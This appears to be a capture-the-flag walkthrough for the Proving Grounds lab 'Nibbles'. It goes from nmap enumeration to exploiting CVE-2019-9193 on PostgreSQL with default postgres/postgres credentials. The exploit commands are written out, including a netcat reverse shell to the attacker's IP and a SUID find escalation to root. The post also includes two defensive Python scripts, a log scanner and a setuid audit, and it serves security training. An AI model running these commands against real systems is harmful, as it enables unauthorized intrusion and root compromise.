Nibbles | Proving Grounds | OSCP Preparation
SilentExploit
June 13, 2026

Start off with an nmap scan of the target:
```
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:23 BST
Initiating Parallel DNS resolution of 1 host. at 01:23
Completed Parallel DNS resolution of 1 host. at 01:23, 0.02s elapsed
Initiating SYN Stealth Scan at 01:23
Scanning 192.168.181.47 [65535 ports]
Discovered open port 22/tcp on 192.168.181.47
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 5437/tcp on 192.168.181.47
SYN Stealth Scan Timing: About 48.70% done; ETC: 01:24 (0:00:33 remaining)
Completed SYN Stealth Scan at 01:24, 59.02s elapsed (65535 total ports)
Nmap scan report for 192.168.181.47
Host is up (0.026s latency).
Not shown: 65529 filtered tcp ports (no-response), 2 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
5437/tcp open  pmip6-data
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 59.14 seconds
Raw packets sent: 131110 (5.769MB) | Rcvd: 93481 (22.510MB)
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-13 01:24 BST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 01:24
Completed Parallel DNS resolution of 1 host. at 01:24, 0.01s elapsed
Initiating SYN Stealth Scan at 01:24
Scanning 192.168.181.47 [1000 ports]
Discovered open port 80/tcp on 192.168.181.47
Discovered open port 21/tcp on 192.168.181.47
Discovered open port 22/tcp on 192.168.181.47
Completed SYN Stealth Scan at 01:24, 8.50s elapsed (1000 total ports)
Initiating Service scan at 01:24
Scanning 3 services on 192.168.181.47
Completed Service scan at 01:24, 6.09s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.181.47.
Initiating NSE at 01:24
Completed NSE at 01:24, 5.13s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.21s elapsed
Initiating NSE at 01:24
Completed NSE at 01:24, 0.00s elapsed
Nmap scan report for 192.168.181.47
Host is up (0.025s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT    STATE  SERVICE      VERSION
21/tcp  open   ftp          vsftpd 3.0.3
22/tcp  open   ssh          OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 10:62:1f:f5:22:de:29:d4:24:96:a7:66:c3:64:b7:10 (RSA)
|   256 c9:15:ff:cd:f3:97:ec:39:13:16:48:38:c5:58:d7:5f (ECDSA)
|_  256 90:7c:a3:44:73:b4:b4:4c:e3:9c:71:d1:87:ba:ca:7b (ED25519)
80/tcp  open   http         Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Enter a title, displayed at the top of the window.
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
<SNIP>
```
My nmap syntax came through for me on this box: it gave an accurate picture of ALL the ports open on the target. I usually pay particular attention to the results from the first (full-port) scan, because it shows the open ports that need further probing to determine the service behind them.
Here is a quick breakdown of my notes on the services that I went through before getting to port 5437 (the entry vector).
Port 21 - FTP
- brute forcing attempted but unfortunately this fails
Port 139,445 - SMB
- no null or guest sessions available
Port 80
- fuzzing leads nowhere

Port 5437
What service do we have running on this port?
```
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# nmap -sVC $target -p 5437
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-12 23:15 BST
Nmap scan report for 192.168.181.47
Host is up (0.024s latency).
PORT     STATE SERVICE    VERSION
5437/tcp open  postgresql PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2020-04-27T15:41:47
|_Not valid after:  2030-04-25T15:41:47
|_ssl-date: TLS randomness does not represent time
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.77 seconds
```
This confirmed that we had PostgreSQL 11.3–11.9; I attempted various brute forcing attacks from hackviser. Research uncovered that the database by default has a superuser and administrative account called postgres.
Unfortunately for me, none of the brute forcing syntax worked. I am pretty sure that I had a 'correct' pairing but, unfortunately, it didn't show anywhere in my results.
Whilst checking for known public exploits in the services running on the target I came across CVE-2019-9193 (link).
A quick analysis of the exploit code confirms that it uses the 'default' username and password. This is something I would likely have tried anyway, but it definitely cost me a lot of time on this machine, as I was struggling to find an entry point for quite a while.
```python
parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to use to connect to the PostgreSQL DB [Default: postgres]')
parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to use to connect to the the PostgreSQL DB [Default: postgres]')
```

Basically, the exploit allows an authenticated user to execute arbitrary operating system commands with the privileges of the database server. It achieves this by misusing the legitimate COPY ... FROM PROGRAM SQL command to run a system command and pipe the output directly into a temporary database table.
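The defender's view of the same primitive, as an added example that is neither the exploit's nor the author's code: a Python scanner over a constructed sample of PostgreSQL statement logs that flags COPY ... FROM PROGRAM and the `_<32 hex>` scratch tables seen in the exploit output, while leaving ordinary file-based COPY alone. Worth knowing when triaging: PostgreSQL treats COPY FROM PROGRAM as intended superuser functionality (in 11.x also grantable via the pg_execute_server_program role), so the durable fixes are non-default credentials, no superuser for application logins and no network exposure of the port, with statement logging as the detection layer. The log format assumes log_statement = 'all' and the default log_line_prefix '%m [%p] '.

```python
import re

# Constructed sample of PostgreSQL server log lines (log_statement = 'all', default
# log_line_prefix '%m [%p] '); not captured from the target. The session shape
# (scratch table, COPY FROM PROGRAM, cleanup) mirrors the exploit output in the post.
SAMPLE_LOG = """\
2026-06-13 01:31:02.114 BST [2231] LOG:  connection authorized: user=postgres database=postgres SSL enabled
2026-06-13 01:31:02.250 BST [2231] LOG:  statement: CREATE TABLE _a6b40979934439ef731b6a8052be1158(cmd_output text);
2026-06-13 01:31:02.262 BST [2231] LOG:  statement: COPY _a6b40979934439ef731b6a8052be1158 FROM PROGRAM 'whoami';
2026-06-13 01:31:02.281 BST [2231] LOG:  statement: DROP TABLE _a6b40979934439ef731b6a8052be1158;
2026-06-13 01:32:10.005 BST [2240] LOG:  statement: COPY orders FROM '/var/lib/postgresql/import/orders.csv' WITH (FORMAT csv);
2026-06-13 01:32:11.900 BST [2240] LOG:  statement: copy   _deadbeefdeadbeefdeadbeefdeadbeef from program 'id';
"""

# Only lines that carry a logged SQL statement are of interest.
STATEMENT_RE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] LOG:  statement: (?P<sql>.*)$")
# COPY ... FROM PROGRAM is the server-side command execution primitive; a plain
# COPY ... FROM 'file' is ordinary bulk loading and is deliberately not matched.
FROM_PROGRAM_RE = re.compile(r"\bCOPY\b.*?\bFROM\s+PROGRAM\b", re.IGNORECASE | re.DOTALL)
# Scratch tables named _<32 hex chars>, the naming seen in the exploit output above.
SCRATCH_TABLE_RE = re.compile(r"\bCREATE\s+TABLE\s+_[0-9a-f]{32}\b", re.IGNORECASE)


def scan_postgres_log(text: str) -> list[dict]:
    """Return one alert dict (pid, ts, reason, sql) per suspicious statement, in log order."""
    alerts = []
    for line in text.splitlines():
        m = STATEMENT_RE.match(line)
        if not m:
            continue
        sql = m["sql"]
        if FROM_PROGRAM_RE.search(sql):
            reason = "COPY ... FROM PROGRAM: OS command run as the postgres service account"
        elif SCRATCH_TABLE_RE.search(sql):
            reason = "scratch table _<32 hex>: output-capture table used by exploit tooling"
        else:
            continue
        alerts.append({"pid": m["pid"], "ts": m["ts"], "reason": reason, "sql": sql})
    return alerts


def exec_sessions(alerts: list[dict]) -> set[str]:
    """Backend PIDs that actually ran a program, for correlation with 'connection authorized' lines."""
    return {a["pid"] for a in alerts if a["reason"].startswith("COPY")}


if __name__ == "__main__":
    found = scan_postgres_log(SAMPLE_LOG)
    for a in found:
        print(f"[{a['ts']}] pid={a['pid']} {a['reason']}\n    {a['sql']}")
    print("sessions with command execution:", sorted(exec_sessions(found)))
```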
```
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c whoami
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a6b40979934439ef731b6a8052be1158
[+] Command executed
postgres
[+] Deleting table _a6b40979934439ef731b6a8052be1158
```
With code execution confirmed on the target, I moved on to obtaining a reverse shell. The usual n00b port for my reverse connection (4444) failed; whenever this happens I just switch to a more common port, e.g. 80 or 443.
```
┌──(root㉿user)-[/run/…/user/2024/HTBox/nibbles]
└─# python3 exp.py -i $target -p 5437 -U postgres -P postgres -c 'nc -c sh 192.168.45.180 80'
[+] Connecting to PostgreSQL Database on 192.168.181.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _a2c5d9eec8b288b0590b9c9847d98c40
```
Shell obtained as postgres:
```
┌──(venv)─(root㉿user)-[/home/user/Downloads]
└─# rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.180] from (UNKNOWN) [192.168.181.47] 39082
id
uid=106(postgres) gid=113(postgres) groups=113(postgres),112(ssl-cert)
```
Lateral movement
I checked what users had shells on the system and confirmed that we have Wilson and Root.
After some time spent trying to pillage credentials for Wilson (perusing his home directory and the web directory), I ran linpeas on the target to see if I could nab a quick win.
The SUID section of linpeas confirmed that /usr/bin/find runs with the setuid bit set.
I headed over to GTFOBins and grabbed the SUID syntax for spawning a root shell.
This command leverages the find utility to execute a shell (/bin/sh) with the -p flag, which tells the shell to keep, rather than drop, the elevated effective UID it inherits when find has the SUID bit set or is run via sudo. As a result, the user drops into a root shell, as demonstrated by the effective user ID (euid=0(root)) in the output below.
```
postgres@nibbles:/tmp$ find . -exec /bin/sh -p \; -quit
find . -exec /bin/sh -p \; -quit
# id
id
uid=106(postgres) gid=113(postgres) euid=0(root) groups=113(postgres),112(ssl-cert)
```
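The root cause of the escalation is the stray setuid bit on /usr/bin/find, which is exactly what a host baseline check should catch before an attacker does. The following is an added example, not code from the post or from linpeas: a Python audit that walks a filesystem, lists setuid regular files and reports any not on an expected baseline. The EXPECTED_SUID set is an illustrative allow-list (an assumption, not a distro-published manifest), and build_demo_tree() creates a constructed fixture so the audit can be exercised without touching the real root.

```python
import os
import stat
import tempfile

# Illustrative baseline of setuid programs a stock Debian host is expected to carry
# (an assumption for this example, not a distro manifest). find(1) is deliberately
# absent: a setuid find hands out a root shell through -exec, as the post shows.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
                 "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount"}
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}   # pseudo-filesystems, nothing to audit there


def find_setuid(root: str) -> list[tuple[str, int]]:
    """Return (absolute path, owner uid) for every regular file under root with the setuid bit."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: a symlink's own mode bits never matter
            except OSError:
                continue                     # unreadable entry; keep walking
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def unexpected_setuid(root: str, expected: set[str] = EXPECTED_SUID) -> list[tuple[str, int]]:
    """Setuid files not on the baseline, as (root-relative path, owner uid), e.g. ('/usr/bin/find', 0)."""
    rogue = []
    for path, uid in find_setuid(root):
        rel = "/" + os.path.relpath(path, root)
        if rel not in expected:
            rogue.append((rel, uid))
    return sorted(rogue)


def build_demo_tree() -> str:
    """Constructed fixture: one legitimate setuid file, one rogue one (find) and one plain binary."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("passwd", 0o4755), ("find", 0o4755), ("ls", 0o755)):
        path = os.path.join(bindir, name)
        open(path, "w").close()
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    print("demo tree:", unexpected_setuid(build_demo_tree()))   # only /usr/bin/find should appear
    print("this host:", unexpected_setuid("/"))                  # review each hit against your own baseline
```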